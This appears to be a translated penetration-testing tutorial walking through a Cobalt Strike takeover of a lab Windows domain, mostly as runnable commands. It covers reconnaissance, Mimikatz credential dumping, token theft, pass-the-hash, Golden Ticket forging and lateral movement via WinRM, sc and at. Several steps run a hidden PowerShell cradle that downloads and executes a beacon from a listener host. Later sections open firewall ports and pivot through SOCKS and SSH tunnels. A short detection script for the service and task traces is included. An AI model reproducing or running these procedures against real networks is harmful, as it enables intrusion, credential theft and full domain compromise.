Cobalt Strike: penetration within a Windows domain

Disclaimer:
This note is prepared only to improve security knowledge and share it with more people. Do not use the techniques in this note for illegal activities; the consequences of doing so have nothing to do with the author. We call on everyone to take responsibility for maintaining network security and to jointly safeguard a civilized and harmonious network.

1 Experimental Environment

1.1 experimental topology

1.2 configure Win08/Win7

In real enterprise administration, ordinary domain users sometimes need the domain administrator's account and password to perform privileged operations. For convenience, administrators therefore sometimes add ordinary domain users to the local Administrators group of the target host. In this lab, the domain user tester01 is added to the local Administrators group of Win08 and Win7.

2. Collect information within the domain

2.1 query current privileges

  1. Get current user and domain SID

    whoami /all

  2. Query the details of the specified user

    # Query local user details
    net user user01
    
    # Query domain user details
    net user tester01 /domain
    

2.2 determine whether there is a domain

  1. Common commands for checking:

    shell ipconfig /all
    shell systeminfo
    
  2. net view /domain

    • Normal output indicates that this machine is in a domain;

    • If the output shows WORKGROUP, there is no domain;

    • If the error "System error 5 has occurred" is reported, the domain exists but the current user is not a domain user;

    • Workaround when net view returns an error:

      Open cmd with administrator privileges and execute two commands

      net start Browser
      net stop mpssvc

      Execute net view again. If error 6118 is still reported, exit, reopen cmd, and execute net view again.

  3. shell net config workstation

2.3 finding domain controllers

  1. net time /domain

    There are three situations:

    • Domain exists. The current user is not a domain user

    • Domain exists and the current user is a domain user

    • The current network environment is a workgroup, and there is no domain

  2. View the machine name of the domain controller

    nltest /dclist:test

  3. View the host name of the domain controller

    nslookup -type=SRV _ldap._tcp

  4. View the IP of the domain controller

    ping DC.test.lab
    nslookup dc
    
    # Determine whether the domain controller and DNS server are on the same server
    nslookup test.lab
    

  5. View the Domain Controllers group

    net group "domain controllers" /domain

    In a real network there are usually two or more domain controllers in a domain, acting as primary and standby. Query the PDC:

    netdom query pdc

2.4 query live hosts in the current domain

2.4.1 collection with Windows built-in commands

net group "domain computers" /domain

2.4.2 using NetBIOS to detect the intranet

nbtscan - NETBIOS nameserver scanner (unixwiz.net)

NetBIOS is an application programming interface (API) used by LAN programs. It provides a unified command set through which programs request low-level network services, giving the LAN networking and other special functions. Almost all LANs work on the basis of the NetBIOS protocol.

nbtscan is a command-line tool that scans local and remote TCP/IP networks for open NetBIOS name servers. Usage is the same for the Linux version below.

nbtscan.exe 192.168.0.0/24

2.4.3 using ICMP to detect the intranet

for /L %I in (1,1,254) do @ping -w 1 -n 1 10.1.1.%I | findstr "TTL="

2.5 collection with the CS net module

# View domain controller
shell nltest /dclist:[domain]
# When a 32-bit payload runs on a 64-bit system, the nltest path is resolved wrongly and you may be told there is no nltest command. In that case specify the path explicitly with the following command
shell C:\windows\sysnative\nltest /dclist:[domain]

# net module in Beacon
net dclist : Lists the domain controllers for the current domain
net dclist [DOMAIN] : Lists the domain controllers for the specified domain
net share \\[name] : List the target's shares
net view : Lists the hosts in the current domain
net view [DOMAIN] : Lists the hosts for the specified domain

2.6 collection with the PowerView module

# Import the PowerShell script
powershell-import PowerTools-2.0\PowerView\powerview.ps1

# Query local domain information
powershell Get-NetDomain

# Check if there is a network share
powershell Invoke-ShareFinder

3. Determine local administrator rights

3.1 confirm whether the current user is a local administrator

  1. Query with a Windows built-in command

    shell net localgroup "administrators"
    

  2. Try a command that requires administrator permission, and judge from the result whether the current account has administrator rights.

    shell dir \\win08\c$
    
    # A result like the following shows that the domain account is also a local administrator of win08
    

  3. Use PowerView to find hosts where the current user has local administrator access

    Invoke-FindLocalAdminAccess

3.2 confirm whether the current user is a domain administrator

shell net group "enterprise admins" /domain
shell net group "domain admins" /domain
shell net localgroup "administrators" /domain

The results show that TEST\tester01 is not a domain administrator

3.3 finding local administrators with the PowerView module

Get-NetLocalGroup -HostName win7

4 Exploitation

If the domain user is a local administrator of other domain member servers, the following operations can be performed without malware.

Here, the remote host win08 is used as the target host for testing.

4.1 file operations

  1. View file shares

    shell dir \\win08\c$
    

  2. Copy file

    shell copy \\win08\c$\users\administrator\desktop\file.txt
    

  3. View file list

    shell dir /s /b \\win08\c$\users
    # /S lists all files in the specified directory and its subdirectories; /B uses bare format, i.e. no heading or summary information
    

4.2 running commands with WinRM

4.2.1 WinRM

WinRM (Windows Remote Management) is the Windows implementation of WS-Management. It listens on port 5985 and allows remote users to manage Windows servers and obtain data with tools and scripts. The service is enabled by default on Server 2008 R2; since Server 2012 it has been integrated into the system and is enabled by default. Win7 installs the service by default but leaves it disabled; Win8 and Win10 have it enabled by default. This kind of remote connection is not noticed by the user logged on at the client and does not count against the number of remote (desktop) connections.

# Quickly run winrm on the server
c:\> winrm quickconfig

# Check the operation of winrm
c:\> winrm e winrm/config/listener

# View winrm configuration
c:\> winrm get winrm/config

# Set allowUnencrypted in the service to true to allow unencrypted communication
c:\> winrm set winrm/config/service @{AllowUnencrypted="true"}

# Set basic authentication in client to true to allow
c:\> winrm set winrm/config/client/auth @{Basic="true"}

# Set allowUnencrypted in the client to true to allow unencrypted communication
c:\> winrm set winrm/config/client @{AllowUnencrypted="true"}

# Set the client addresses trusted by the host. host1, host2 and host3 are the IPs or host names of your client machines
c:\> winrm set winrm/config/client @{TrustedHosts="host1, host2, host3"} 

4.2.2 running commands with WinRM

powershell Invoke-Command -ComputerName win08 -ScriptBlock{ dir c:\}
# Note: if the command fails, the cause may be the WinRM configuration. Run winrm quickconfig in a PowerShell session on the remote target host and answer y

4.3 running Mimikatz

Because Beacon's file upload is limited to 1 MB, while Invoke-Mimikatz.ps1 is more than 2 MB (there is also a trimmed 600K version), importing the full file directly with powershell-import will report an error. The solutions are as follows:

  1. Use the 600K version of Invoke-Mimikatz

    powershell-import
    
    # powershell Invoke-Mimikatz -ComputerName TARGET
    powershell Invoke-Mimikatz -ComputerName win08
    

  2. Use the upload command in Beacon, or upload the file through the File Browser of the current session

    upload
    powershell import-module C:\Users\tester01\Invoke-Mimikatz.ps1
    
    # If you are prompted that the term "Invoke-Mimikatz" is not recognized as the name of a cmdlet, function, ..., combine the two commands with a semicolon, that is:
    powershell import-module C:\Users\tester01\Invoke-Mimikatz.ps1;Invoke-Mimikatz -ComputerName win08
    
  3. Use WinRM to spawn a Beacon session

    powershell Invoke-Command -ComputerName win08 -ScriptBlock{ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.2:280/a'))"}
    
    

5 login authentication

5.1 create login Token

Access Token: stores the privilege information of the current user. Each process may be started as a different user and therefore carries a different access token. To operate as a particular domain user, find a process running under that domain user's identity and steal its token.

Using the Win08 host to make a token for accessing the domain controller

  1. View current user identity

    getuid
    

  2. View the current processes and the user identity each runs under

    ps
    

  3. Run steal_token on a process running under a higher-privileged user identity

    steal_token 2116
    

  4. View current user identity

    getuid
    

  5. Make Token

    # make_token domain\user password
    make_token test\administrator Admin123
    

  6. View the C drive of the domain controller

    shell dir \\dc\c$
    

  7. Clear Token

    rev2self
    

5.2 using Password

  1. When the domain administrator account has authenticated on the Win08 host, use mimikatz on Win08 to collect passwords and obtain the domain administrator's password

  2. Establish remote connection

    # net use \\host\c$ /user:domain\user password
    shell net use \\dc\c$ /user:test\administrator Admin123
    

  3. View the C drive of the domain controller

    shell dir \\dc\c$
    

5.3 using Password Hash (Pass The Hash)

Pass the Hash has to interact with the lsass.exe process, so the operation must be performed with high privilege: Administrator or SYSTEM.

  1. When the domain administrator account has authenticated on the Win08 host, use mimikatz on Win08 to collect the domain administrator's NTLM hash

    e45a314c664d40a227f9540121d1a29d
    
  2. Pass-the-hash against the remote host

    # pth [DOMAIN\user] [NTLM hash]
    pth .\administrator e45a314c664d40a227f9540121d1a29d
    

  3. View the C drive of the domain controller

    shell dir \\dc\c$
    

5.4 Golden Ticket

5.4.1 preconditions for using a Golden Ticket

Reference: Detailed explanation of Kerberos Golden Tickets - Penetration Testing Center - cnblogs.com

The domain environment has an account krbtgt whose SID ends in 502 (RID 502). It is the account used by the KDC service and belongs to the Domain Admins group. In the domain, every user account's ticket is generated with krbtgt. If an attacker obtains the NTLM hash or AES-256 key of krbtgt, he can forge the identity of any user in the domain and access other services as that user.

When performing pass-the-ticket with a Golden Ticket for the domain, the following are required:

  • The domain administrator user name to forge.
  • The complete domain name.
  • The domain SID.
  • The NTLM hash or AES-256 key of krbtgt.

5.4.2 Kerberos Golden Ticket operation process

  1. Get domain SID

    shell whoami /user
    S-1-5-21-1207377116-2664972910-881425611
    

  2. Permission test before ticket injection. Access denied is displayed at this point

    shell dir \\dc\c$
    

  3. List Kerberos tickets

    shell klist
    
    # 64 bit
    shell c:\windows\sysnative\klist
    
  4. Obtain the NTLM hash of the KRBTGT user on the DC

    # The NTLM hash of the KRBTGT user on the DC can be obtained with dcsync or hashdump, or by loading mimikatz via PowerShell.
    hashdump
    fa02a0e57e5ba9189d00990ae64e87ce
    

  5. Forge the Golden Ticket and inject it into memory

    # The domain must be given as an FQDN (Fully Qualified Domain Name), for example test.lab
    
    mimikatz kerberos::golden /user:Administrator /domain:test.lab /sid:S-1-5-21-1207377116-2664972910-881425611 /krbtgt:fa02a0e57e5ba9189d00990ae64e87ce /ptt
    

  6. Verify permissions

    shell dir \\dc\c$
    

  7. Other commands

    # Clear tickets for current session
    kerberos_ticket_purge
    
    # Import ticket from ccache file to apply to this session
    kerberos_ccache_use
    
    # Import ticket from ticket file to apply to this session 
    kerberos_ticket_use
    

6. Lateral movement in the internal network

Win7 login user test\tester01 is known to be the local administrator of Win08

shell dir \\win08\c$

6.1 running the Payload with WinRM

Premise: the target host can access the Internet, and the permission obtained is that of the user running the command

powershell Invoke-Command -ComputerName win08 -ScriptBlock{ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.2:280/a'))" }

6.2 remote execution of the Payload program with sc

Premise: the target host can access the Internet, and the permission obtained is SYSTEM.

  1. Generate Payload program

  2. Upload the malicious program to the controlled Win7 host

    upload C:\Users\f_carey\Desktop\beacon.exe (C:\Users\tester01\beacon.exe)
    

  3. From the controlled Win7, copy the Payload program to the intranet Win08 host

    shell copy C:\Users\tester01\beacon.exe \\win08\c$\windows\temp\beacon.exe
    

  4. From win7, remotely create a service for the Payload program on win08

    shell sc \\win08 create beacon binpath= c:\windows\temp\beacon.exe
    

  5. From win7, remotely start the Payload service on win08

    shell sc \\win08 start beacon
    

  6. From win7, remotely delete the created Payload service on win08

    shell sc \\win08 delete beacon
    

6.3 remote execution of the Payload program using at

  1. Generate Payload program

  2. Upload the malicious program to the controlled Win7 host

    upload C:\Users\f_carey\Desktop\artifact.exe (C:\Users\tester01\artifact.exe)
    

  3. From the controlled Win7, copy the Payload program to the intranet Win08 host

    shell copy C:\Users\tester01\artifact.exe \\win08\c$\windows\temp\artifact.exe
    

  4. View the current time of Win08 host

    shell net time \\win08
    

  5. Remotely schedule execution of the Payload program

    shell at \\win08 9:07:00 c:\windows\temp\artifact.exe
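As an added defender-side example (not from the original note), this Python flags the traces that the sc procedure in 6.2 and the at procedure in 6.3 leave in constructed System 7045 (service installed) and Security 4698 (scheduled task created) records: a service whose binary sits in a staging directory such as \windows\temp, and a task named At1 as at.exe creates. The dict layout, the pre-extracted Command field and the staging-directory list are assumptions.

```python
"""Flag remote execution via 'sc create' and 'at' from Windows event records.
Added defender-side example, not code from the original note. Records are
constructed dicts standing in for System 7045 and Security 4698 messages;
the 'Command' field of 4698 is assumed pre-extracted from the task XML.
"""
import re

# Staging paths used in the note ('copy ... \\host\c$\windows\temp\...');
# properly installed services rarely run from these directories (heuristic).
STAGING_DIRS = ("\\windows\\temp\\", "\\users\\public\\",
                "\\temp\\", "\\appdata\\local\\temp\\")
# at.exe jobs are created as Task Scheduler tasks named At1, At2, ...
AT_JOB_NAME = re.compile(r"^\\?At\d+$", re.IGNORECASE)

SAMPLE_7045 = [  # constructed; field names as in the 7045 message body
    {"Service Name": "beacon", "Service File Name": "c:\\windows\\temp\\beacon.exe",
     "Service Start Type": "demand start", "Service Account": "LocalSystem"},
    {"Service Name": "Spooler", "Service File Name": "C:\\Windows\\System32\\spoolsv.exe",
     "Service Start Type": "auto start", "Service Account": "LocalSystem"},
]
SAMPLE_4698 = [  # constructed
    {"Task Name": "\\At1", "Command": "c:\\windows\\temp\\artifact.exe",
     "Subject User Name": "tester01"},
    {"Task Name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "Command": "%windir%\\system32\\defrag.exe", "Subject User Name": "SYSTEM"},
]

def in_staging_dir(path):
    """True when the executable lives in a writable staging directory."""
    lowered = path.strip('"').lower()
    return any(d in lowered for d in STAGING_DIRS)

def check_service_install(event):
    """Reasons a 7045 record matches the 'sc create ... binpath=' pattern."""
    reasons = []
    if in_staging_dir(event["Service File Name"]):
        reasons.append("service binary in staging directory")
    # 'sc create' without start= defaults to demand start, and without obj=
    # to LocalSystem: the combination, from a staging path, is the pattern.
    if (event["Service Account"] == "LocalSystem"
            and event["Service Start Type"].lower() == "demand start"
            and reasons):
        reasons.append("on-demand LocalSystem service")
    return reasons

def check_task_create(event):
    """Reasons a 4698 record matches the 'at HH:MM:SS program' pattern."""
    reasons = []
    if AT_JOB_NAME.match(event["Task Name"]):
        reasons.append("legacy at.exe job name")
    if in_staging_dir(event["Command"]):
        reasons.append("task action in staging directory")
    return reasons

def scan(services=SAMPLE_7045, tasks=SAMPLE_4698):
    """Return (kind, name, reasons) for every record with at least one reason."""
    flagged = []
    for ev in services:
        reasons = check_service_install(ev)
        if reasons:
            flagged.append(("service", ev["Service Name"], reasons))
    for ev in tasks:
        reasons = check_task_create(ev)
        if reasons:
            flagged.append(("task", ev["Task Name"], reasons))
    return flagged
```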
    

6.4 use logon authentication to penetrate the domain controller

See section 5

7 intranet penetration

7.1 configure a SOCKS proxy (forward connection)

  1. Configure the SOCKS proxy: right-click the session and choose Pivoting - SOCKS Server

    socks 8888
    
    # Stop the SOCKS proxy
    socks stop
    

  2. Use proxychains with the SOCKS proxy on the CS Server host

    # Configure proxychains
    vim /etc/proxychains.conf
    socks4  127.0.0.1 8888
    
    # nmap Socks proxy
    proxychains nmap -Pn -sT -p80 10.1.1.21
    

  3. Use MSF with the SOCKS proxy on the CS Server host

    msf6 > setg Proxies socks4:192.168.0.2:8888
    Proxies => socks4:192.168.0.2:8888
    msf6 > setg ReverseAllowProxy true
    ReverseAllowProxy => true
    
    # Cancel msf global proxy
    unsetg Proxies
    

7.2 configure a pivot listener (reverse connection)

Note: for a reverse connection the firewall must allow the listening port

  1. Select the Win08 session, right-click and choose Pivoting - Listener. The pivot listener here means that Win08 acts as a relay forwarding traffic for the DC.

    # The listener address should be configured with the intranet IP
    rportfwd 380 windows/beacon_reverse_tcp
    

  2. Generate a stageless executable backdoor (Windows Executable (S)) and choose the pivot listener as its listener

  3. Check whether the firewall on Win08 is on

    shell netsh firewall show opmode
    

  4. Open the firewall port on Win08

    shell netsh firewall add portopening TCP 380 "Listener" ENABLE ALL
    

  5. Run steal_token on a process running as the domain administrator on Win08

    steal_token 876
    

  6. Upload the generated Payload backdoor to a Win08 directory and copy it to the domain controller

    upload C:\Users\f_carey\Desktop\beacon.exe (C:\Windows\Temp\beacon.exe)
    shell copy C:\Windows\Temp\beacon.exe \\dc\c$\windows\temp\beacon.exe
    

  7. Remotely execute the Payload with sc/at

    shell sc \\dc create beacon binpath= c:\windows\temp\beacon.exe
    shell sc \\dc start beacon
    
    shell net time \\dc
    shell at \\dc 10:07:00 c:\windows\temp\beacon.exe
    

  8. Obtain the Beacon session of the domain controller

7.3 Cobalt Strike SSH tunnel

SSH supports a bidirectional communication tunnel and automatically encrypts and decrypts all network data between SSH client and server. Traffic of other TCP ports can be forwarded through the SSH connection, and because the data is encrypted it can bypass restrictions imposed by firewall access rules.

# Common ssh parameters for establishing an SSH tunnel:

-C
    Request compression of all data (including stdin, stdout, stderr, and data for forwarded X11 and TCP/IP connections). The compression algorithm is the same as gzip(1); in protocol version 1 the compression level is controlled by the CompressionLevel option. Compression is useful on modem lines and other slow connections, but on fast networks it may only slow things down. This can be set per host in the configuration file; see also the Compression option.

-g
    Allow remote hosts to connect to local forwarded ports. That is, when several hosts need the forwarded port, the local machine acts as a gateway so that multiple hosts can reach the local listening port, e.g. to forward RDP or an nc shell in gateway mode.

-n
    Redirect stdin from /dev/null (actually, prevent reading from stdin). This must be used when ssh runs in the background. A common trick is to use it to run X11 programs on a remote machine; for example, ssh -n shadows.cs.hut.fi emacs starts emacs on shadows.cs.hut.fi, with the X11 connection automatically forwarded over the encrypted channel and the ssh program put in the background. (This does not work if ssh needs to ask for a password or passphrase; see also the -f option.)

-N
    Do not execute a remote command. Useful for just forwarding ports (protocol version 2 only); that is, no login shell is started.

-f
    Run ssh in the background. This implies -n. The recommended way to start X11 programs on a remote site is with something like ssh -f host xterm.

-p port
    Port to connect to on the remote host. This can be specified per host in the configuration file.

-q
    Quiet mode. Suppress all warning and diagnostic messages.

-L port:host:hostport
    Forward the given port on the local (client) machine to the given host and port on the remote side. This works by allocating a socket to listen on port on the local side; whenever a connection is made to this port, it is forwarded over the secure channel and a connection is made to host port hostport from the remote machine. Port forwardings can also be specified in the configuration file. Only root can forward privileged ports. IPv6 addresses use an alternative syntax: port/host/hostport.

-R port:host:hostport
    Forward the given port on the remote (server) machine to the given host and port on the local side. This works by allocating a socket to listen on port on the remote side; whenever a connection is made to this port, it is forwarded over the secure channel and a connection is made to host port hostport from the local machine. Port forwardings can also be specified in the configuration file. Privileged ports can be forwarded only when logging in to the remote host as root. IPv6 addresses use an alternative syntax: port/host/hostport.

-D port
    Specify a local "dynamic" application-level port forwarding. This works by allocating a socket to listen on port on the local side; whenever a connection is made to this port, it is forwarded over the secure channel, and the application protocol is then used to determine where to connect from the remote machine. Currently the SOCKS4 protocol is supported, and ssh acts as a SOCKS4 server. Only root can forward privileged ports. Dynamic port forwardings can also be specified in the configuration file.

-T
    Disable pseudo-terminal allocation.

7.3.1 experimental environment

  1. Experimental topology

  2. Prerequisites

    1. The Beacon session of Win7 has been obtained and switched to interactive mode

    2. The WebServer account and password are known, and the SSH service is running on the WebServer

    3. The logon token of the DC server has been obtained, and the DC's firewall is off or port 445 is open

      netsh firewall add portopening TCP 445 "SMB" ENABLE ALL
      

7.3.2 steps for configuring SSH tunnel (SSH Over Socks4)

  1. Configure the TeamServer host

    # 1. Establish dynamic port forwarding between the CS Server and the Web Server
    ssh -CNfg -D <local listen port> user@<ssh server> -p <ssh server port>
    
    ssh -CNfg -D 1080 root@192.168.0.3 -p 23
    
    # 2. Configure SSH Over Socks4 port forwarding
    # Data accessing TeamServer local port 445 will be forwarded to port 445 of 10.0.0.6 
    socat TCP4-LISTEN:445,fork SOCKS4:localhost:10.0.0.6:445
    

    Knowledge supplement: SSH over SCTP (using socat)

    # Remote server
    # Suppose the SCTP socket listens on port 80/SCTP and sshd on port 22/TCP
    $ socat SCTP-LISTEN:80,fork TCP:localhost:22
    
    # Local end
    # Replace SERVER_IP with the address of the remote server, and 80 with the SCTP listening port
    $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
    # Create the SOCKS proxy
    # Replace username and the -p port number accordingly
    $ ssh -lusername localhost -D 8080 -p 1337
    
  2. Create a DC server token in CS

    # make_token domainname\username password
    make_token DC\Administrator Admin123
    

  3. Create a Beacon session on the DC server

    # Create an SMB Beacon listener in CS
    # Create the Beacon session of the DC server through the springboard machine
    jump psexec_psh <springboard machine IP> smb-beacon
    # The springboard machine here is the IP of the TeamServer, because port 445 is forwarded on the TeamServer
    
    jump psexec_psh 192.168.0.2 smb-beacon
    


Added by silvrfoxx on Tue, 25 Jan 2022 18:08:38 +0200